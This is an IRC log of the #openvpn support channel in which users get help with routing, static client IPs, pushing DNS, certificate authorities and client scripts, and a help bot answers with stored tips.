http://pastebin.com/QwPwXpMy 14:34 < timmmaaaayyy> anything else i can provide that might help troubleshoot? 14:34 < pekster> You can ping the client VPN IP from the server? 14:35 < pekster> 10.8.0.13 in that example 14:35 < pekster> (ie: last paste) 14:37 < timmmaaaayyy> yes that works 14:37 < timmmaaaayyy> got it working end to end 14:38 < pekster> What OS is the server? 14:38 < timmmaaaayyy> i needed to enable routing and remote access service on the win7 machine....just the registry hack wasn't enough 14:38 < timmmaaaayyy> the server is debian 14:38 < timmmaaaayyy> thank you all very much for the help! 14:38 < pekster> Ah, right. Honestly, you'll have a better experience if your client isn't windows 14:38 < pekster> A $40 router is better suited to run openvpn that Windows, sadly 14:38 < pekster> than* 14:39 < pekster> At least if you want to do stuff like expose a client LAN and possibly do filtering/firewalling on that traffic 14:40 < jzaw> pekster, hehe im using a £10 router .... and its doing admirably ! 14:41 < timmmaaaayyy> yes i totally understand. windows is not optimal, but it's the only option in this case. not that i have it....i'll only needot for about 30 more minutes. thankfully 14:41 < jzaw> ipv4 and ipv6 down the vpn 14:41 < jzaw> and clients behind it all on public ips both 4 and 6 14:56 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 14:58 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has left #openvpn [] 15:09 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 15:13 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 264 seconds] 15:25 -!- cyberspace- [20253@ninthfloor.org] has quit [Read error: Connection reset by peer] 15:26 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 15:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 15:30 -!- p3rror [~mezgani@41.140.196.35] has quit [Read error: Operation timed out] 15:34 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:35 -!- master_of_master [~master_of@p4FF24F0C.dip.t-dialin.net] has joined #openvpn 15:39 -!- master_o1_master [~master_of@p4FF24D0B.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 16:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:05 -!- Hellasaurus [~Hellcore@cpc26-soli5-2-0-cust494.19-1.cable.virginmedia.com] has joined #openvpn 16:06 < Hellasaurus> !welcome 16:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample 16:06 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:06 < Hellasaurus> !redirect 16:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:06 <@vpnHelper> http://ircpimps.org/redirect.png 16:07 < Hellasaurus> !dns 16:07 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 16:07 < Hellasaurus> !pushdns 16:07 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 16:07 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 16:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 16:37 < Hellasaurus> !howto 16:37 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 16:46 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 255 seconds] 16:50 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 17:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:18 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:27 -!- Hellasaurus [~Hellcore@cpc26-soli5-2-0-cust494.19-1.cable.virginmedia.com] has quit [] 17:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 17:39 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 17:41 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds] 17:44 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 17:45 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 17:48 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 18:06 -!- brute11k [~brute@89.249.231.71] has quit [Quit: Leaving.] 18:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 18:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 18:33 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:40 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 18:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:55 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 18:58 -!- [fred] [fred@konfuzi.us] has joined #openvpn 19:01 -!- master_o1_master [~master_of@p4FF2433B.dip.t-dialin.net] has joined #openvpn 19:04 -!- master_of_master [~master_of@p4FF24F0C.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 19:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:07 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 19:27 -!- djshotglass [~Guest7552@out-bc-149.wireless.telus.com] has joined #openvpn 19:28 < djshotglass> i have 3 vpn clients sharing a cert how do i give them each static ip 19:30 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds] 19:33 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault] 19:33 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 19:35 -!- erry_ is now known as erry 19:36 < pekster> djshotglass: You don't. Or write some creative --client-connect script to use another definable attribute to somehow apply your own magic to uniquely identify each user (source IP, etc.) That's a poor solution, IMO. Optionally, also require user/pass auth in addition to the same cert and use the username. The correct way to do this is issue unique certs per user. 19:37 < djshotglass> hmm ok 19:38 < pekster> You can look at the --ifconfig-pool-persist option, but that is notably not the same as static IPs and shouldn't be used if that's what you really want. See: 19:38 < pekster> !ipp 19:38 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static 19:39 < djshotglass> !iporder 19:39 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 19:39 < djshotglass> !static 19:39 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 19:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 20:09 -!- Guest75521 [~Guest7552@out-bc-149.wireless.telus.com] has joined #openvpn 20:11 -!- djshotglass [~Guest7552@out-bc-149.wireless.telus.com] has quit [Ping timeout: 252 seconds] 20:12 -!- Guest75521 [~Guest7552@out-bc-149.wireless.telus.com] has quit [Client Quit] 20:23 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:31 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:40 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 20:41 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 21:58 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 22:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 22:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 22:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 23:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 23:22 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:23 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 23:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds] 23:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn --- Day changed Mon Mar 18 2013 01:09 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:14 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 01:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 02:02 < jzaw> !ccd 02:02 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 02:07 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn 02:16 -!- xbanux [~xbanux@triband-mum-59.182.156.172.mtnl.net.in] has joined #openvpn 02:22 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 02:25 -!- mustu__ [~maan@119.63.130.93] has quit [Quit: Lost terminal] 02:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 02:33 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has joined #openvpn 02:33 < ocei3ko> Hello, I'm trying to use openvpn on a wifi network that uses a 10.x address, and openvpn does not add routes 02:33 < ocei3ko> Why? 02:34 < ocei3ko> Doesnt even add tun0 02:39 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 02:46 < ocei3ko> Is there a configuration option I should be using? 02:56 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has quit [Ping timeout: 245 seconds] 02:57 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has joined #openvpn 02:57 < ocei3ko> Anyone answer my question above? 02:59 -!- master_of_master [~master_of@p4FF24ED5.dip.t-dialin.net] has joined #openvpn 02:59 < jzaw> ocei3ko, pastebin your sever and client confs 02:59 < jzaw> ifconfig output 02:59 < jzaw> and ip route show output 03:00 -!- master_o1_master [~master_of@p4FF2433B.dip.t-dialin.net] has quit [Read error: Operation timed out] 03:00 < ocei3ko> Cant do atm, not on said computer 03:01 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:03 < jzaw> difficult to diagnose anything then 03:06 < ocei3ko> Right, and you have no guesses? 03:07 < jzaw> i guess you have an error in some setting 03:07 < jzaw> and i hazard a guess im 100% right 03:08 < ocei3ko> jzaw, http://pastebin.com/Q3GQq9pV 03:08 < ocei3ko> client config 03:08 -!- xbanux [~xbanux@triband-mum-59.182.156.172.mtnl.net.in] has quit [Read error: Connection reset by peer] 03:08 < ocei3ko> It works on everything but this one public wifi network 03:09 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 03:11 <@EugeneKay> Logs would be helpful 03:11 <@EugeneKay> If I had to guess, it's a subnet conflict. 03:12 < ocei3ko> How would I fix the conflict? 03:12 < ocei3ko> Both try to use 10.*, so it seems to be so 03:13 < ocei3ko> But openvpn doesnt even bring up tun0 03:15 < jzaw> EugeneKay, can i not get client.conf to execute up.sh ? doesnt seem to 03:16 <@EugeneKay> The startup script is handled by your init script 03:16 <@EugeneKay> What OS? 03:17 < jzaw> debian wheezy .... 03:17 < jzaw> no i mean a custom script .... anyname.sh 03:17 < jzaw> which i keep in /etc/openvpn 03:17 < jzaw> the server has one and that executes fine 03:17 < jzaw> chmod +x done 03:17 < jzaw> etc 03:18 < jzaw> i can manually run it 03:19 < jzaw> script-security 2 03:19 < jzaw> set 03:25 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has quit [Read error: Connection reset by peer] 03:31 < jzaw> correction EugeneKay its openwrt im running client on 03:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 03:40 -!- _ddlk_ [~ddlk@183.246.96.215] has joined #openvpn 03:41 -!- _ddlk_ [~ddlk@183.246.96.215] has quit [] 03:41 -!- ddlk [~ddlk@183.246.96.215] has joined #openvpn 03:42 < ddlk> Anyone has experience with openvpn and static key? 03:42 < ddlk> I can ping the server, but cannot access internet 03:49 <@EugeneKay> jzaw - you're referring to a client-connect script, then? 03:50 <@EugeneKay> Or rather, a connect 03:50 <@EugeneKay> !logs 03:50 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 03:51 <@EugeneKay> !redirect 03:51 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 03:51 <@vpnHelper> http://ircpimps.org/redirect.png 03:51 <@EugeneKay> ddlk - follow the chart ^ 03:58 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 240 seconds] 03:59 -!- brute11k [~brute@89.249.231.66] has joined #openvpn 04:05 < ddlk> wow, nice chart, tring it, thanks :D 04:06 -!- zamba [marius@flage.org] has quit [Ping timeout: 245 seconds] 04:06 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 04:14 -!- zz_AsadH is now known as AsadH 04:29 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 04:29 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 04:31 < Rienzilha> hmm 04:31 < Rienzilha> how hard is it to distribute an openvpn configuration (and possibly, initiate an install of openvpn) with another software package? 04:31 < Rienzilha> and will I run into licensing issues? 04:32 -!- dpecka [~dpecka@193.165.171.107] has joined #openvpn 04:32 < dpecka> hello 04:32 < Rienzilha> (the package in question is open source, but I'm not sure about its license) 04:33 < dpecka> i'd like to ask for something .. i have openvpn, it's working great .. i have no deep experience and knowledge with PKI infra .. i was always using self-signed certs .. when i will configure an openvpn server to use a server.key signed by CA which i don't own, the server will have to periodically check on remote CA, if the key is valid via crl ? 04:34 -!- ddlk [~ddlk@183.246.96.215] has quit [Read error: Connection reset by peer] 04:36 -!- ddlk [~ddlk@183.246.96.215] has joined #openvpn 04:37 <@EugeneKay> The general wisdom is do not use public/commercial CAs 04:37 <@EugeneKay> If you do, set up regular CRL downloading and strong CN checks 04:37 < dpecka> EugeneKay: no, not public but one which is owned by my employer 04:38 <@EugeneKay> Then there's less worry there - you can trust the CA quite a bit 04:41 < dpecka> EugeneKay: hmm .. it's rather politic problem ... i don't want to be fully responsible for a keys security 04:42 < dpecka> EugeneKay: the server was using until now exclusively by our devels, now they want to sell something from inside to customer and let them enter 04:42 < dpecka> **the serevr has been used 04:42 <@EugeneKay> Blah 04:43 -!- ddlk [~ddlk@183.246.96.215] has quit [] 04:43 <@EugeneKay> I would set up a (possibly intermediate) CA exclusively for handling this task 04:44 < dpecka> so i want to get the rid of PKI/certs responsibility .. the ca of our company is maintained by our internal sysadmins who can generate a keys however they are unable to administere my openvpn, so the plan is that i will import new server.key to my server and will distribute new clients generetad with the new set of keys 04:49 <@EugeneKay> Sounds sane 05:02 -!- hatschi_ [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn 05:03 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Ping timeout: 260 seconds] 05:03 -!- hatschi_ is now known as hatschi 05:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 05:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 05:18 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-lmbdyojognqqrrqo] has quit [Ping timeout: 264 seconds] 05:18 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 264 seconds] 05:19 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn 05:21 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Ping timeout: 240 seconds] 05:27 -!- dazo_afk is now known as dazo 05:33 -!- thinkHell [~Hell@85.15.47.27] has quit [Ping timeout: 258 seconds] 05:46 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 255 seconds] 05:52 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Ping timeout: 260 seconds] 05:55 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 05:57 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn 06:18 -!- master_o1_master [~master_of@p4FF24BF8.dip.t-dialin.net] has joined #openvpn 06:21 -!- master_of_master [~master_of@p4FF24ED5.dip.t-dialin.net] has quit [Ping timeout: 258 seconds] 06:22 < jzaw> ping pekster 06:27 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 06:37 -!- Colttt [~stefan.kr@cpe-001a8c164de9.ip-pool.rftonline.net] has joined #openvpn 06:37 < Colttt> hello everybody.. 06:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 255 seconds] 06:38 < Colttt> i have a problem, on one computer i got an error when i connect to our server: MANAGEMENT: listen() failed: Permission denied (WSAEACCES) (errno=10013) 06:39 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-vqvgtzvvbbbougmj] has joined #openvpn 06:39 < Colttt> i use windows7 64bit 06:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:40 < Colttt> and openvpn version 2.1.1 06:46 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection] 06:47 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 06:48 -!- zamba [marius@flage.org] has joined #openvpn 07:14 -!- kubbing_ [~kubbing@c-006.certicon.cz] has joined #openvpn 07:14 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 264 seconds] 07:19 -!- novaflash is now known as novaflash_away 07:19 -!- novaflash_away is now known as novaflash 07:25 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 07:26 -!- kubbing_ [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection] 07:27 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 07:30 -!- Colttt [~stefan.kr@cpe-001a8c164de9.ip-pool.rftonline.net] has left #openvpn [] 07:34 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 07:36 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 07:37 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 07:41 -!- newbie|2 [~tjz@67.228.240.11-static.reverse.softlayer.com] has joined #openvpn 07:44 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 245 seconds] 07:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:58 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:06 -!- sisar [~chatzilla@64.62.201.17] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 08:24 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Read error: Operation timed out] 08:27 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn 08:30 -!- newbie|2 [~tjz@67.228.240.11-static.reverse.softlayer.com] has quit [Ping timeout: 246 seconds] 08:31 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 08:33 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Quit: hatschi] 08:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 08:52 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:58 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 09:02 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has joined #openvpn 09:03 < MaynardWaters> hello, I am trying to figure out why my openvpn on ubuntu does not act like my openvpn on windows. When I use the openvpn on ubuntu, it does not let me access the rest of the internet, but restricts me to only getting to the resources housed within that network. do I need a proxy to get back to the internet? 09:03 < dpecka> MaynardWaters: depends .. what tool do you use as a client application ? 09:04 < MaynardWaters> in windows I am using the .exe 09:04 < dpecka> cool story, but i'm asking what client software are u using in ubuntu 09:04 < MaynardWaters> in ubuntu I have tried a number of client apps, the one that works the best (still not as good as the windows one) is built into ubuntu's network-manager applet 09:05 * MaynardWaters is opening up the software center to give specifics 09:05 < dpecka> MaynardWaters: then please try to reproduce your issues with native openvpn software 09:05 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection] 09:06 < MaynardWaters> dpecka, the issue was worse when i tried the openvpn cli 09:06 < MaynardWaters> the halfway good option is network-manager-openvpn-gnome 09:07 < MaynardWaters> if you prefer and it is easier for you to help, I will go back to the openvpn cli 09:07 < dpecka> MaynardWaters: do you realize, that both of them are plainly scripted to use openvpn backend as i suggested to do directly ? 09:07 -!- csaba [~csaba@195.199.154.25] has joined #openvpn 09:07 < MaynardWaters> I did not realize this, but I suspected such 09:07 < csaba> hello 09:08 < dpecka> MaynardWaters: i dunno what's openvpn cli but you should use directly openvpn binary 09:08 < MaynardWaters> dpecka: when i say openvpn cli, i just mean I type "sudo openvpn --config file.ovpn" 09:08 < MaynardWaters> is that the same as what you mean by using the openvpn binary? 09:09 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 09:09 < csaba> I found this website: https://www.secure-computing.net/ 09:09 <@vpnHelper> Title: SCN: SCN (at www.secure-computing.net) 09:09 < csaba> http://www.secure-computing.net/wiki/index.php?title=Special:Upload&wpDestFile=Scn.zip 09:09 <@vpnHelper> Title: Login required - Secure Computing Wiki (at www.secure-computing.net) 09:10 < csaba> but can not download the mentioned file 09:10 < csaba> scn.zip for the openldap schema 09:10 < dpecka> MaynardWaters: http://susepaste.org/view/raw/83690841 << use config like this (refer please to docs) and openvpn .. it will work 09:10 < csaba> am I at the right place? 09:11 < csaba> can you guys help me? 09:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 09:15 < csaba> anyone? 09:15 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 09:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:16 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 09:19 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Ping timeout: 245 seconds] 09:19 -!- ihptru [~ihptru@164.138.25.4] has quit [Ping timeout: 260 seconds] 09:20 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-zxcgkocqnpwnljgq] has quit [Ping timeout: 258 seconds] 09:21 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 09:21 < csaba> vnpHelper: can someone point me where can I get help with OpenLDAP/Authentication 09:22 < csaba> please, there is mentioned on this website a scn.zip file for host verification but is of wrong url 09:22 < csaba> can not download it, 09:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:34 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:35 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 09:37 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:37 -!- pelle2 [~palle@178-132-74-156.cust.azirevpn.net] has left #openvpn [] 09:45 -!- defswork [~andy@141.0.50.105] has joined #openvpn 09:50 -!- defswork [~andy@141.0.50.105] has quit [Remote host closed the connection] 09:51 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection] 09:52 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 10:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 10:07 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has joined #openvpn 10:07 < kls> hello! anyone around for a bit of troubleshooting? i am trying to install openvpn in a vps and have been failing all day. 10:10 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 10:11 -!- defswork [~andy@141.0.50.105] has joined #openvpn 10:13 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has quit [] 10:14 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has joined #openvpn 10:15 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection] 10:15 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has quit [Remote host closed the connection] 10:15 -!- xbanux [~xbanux@triband-mum-59.182.144.193.mtnl.net.in] has joined #openvpn 10:18 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 10:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 10:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:28 -!- xbanux [~xbanux@triband-mum-59.182.144.193.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:29 -!- xbanux [~xbanux@triband-mum-59.182.168.246.mtnl.net.in] has joined #openvpn 10:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:52 < jzaw> anyone set up a server (and client) purely on ipv6? 10:52 < jzaw> not sending ipv6 down an existing ipv4 tunnel but actually an ipv6 tunnel 10:53 < jzaw> potentially and probably routed 10:54 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 10:55 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 10:58 -!- xbanux [~xbanux@triband-mum-59.182.168.246.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:59 -!- xbanux [~xbanux@triband-mum-59.182.161.92.mtnl.net.in] has joined #openvpn 10:59 -!- abec0_ is now known as abec0 11:10 -!- brute11k [~brute@89.249.231.66] has quit [Ping timeout: 264 seconds] 11:12 -!- Dave2 [~Dave2@freenode/staff/dave2] has joined #openvpn 11:13 -!- brute11k [~brute@89.249.235.173] has joined #openvpn 11:16 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-wclmhmpvxmgxurke] has joined #openvpn 11:19 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 246 seconds] 11:21 <@ecrist> csaba: did you ever get things figured out? 11:22 <@EugeneKay> jzaw - should work just fine in 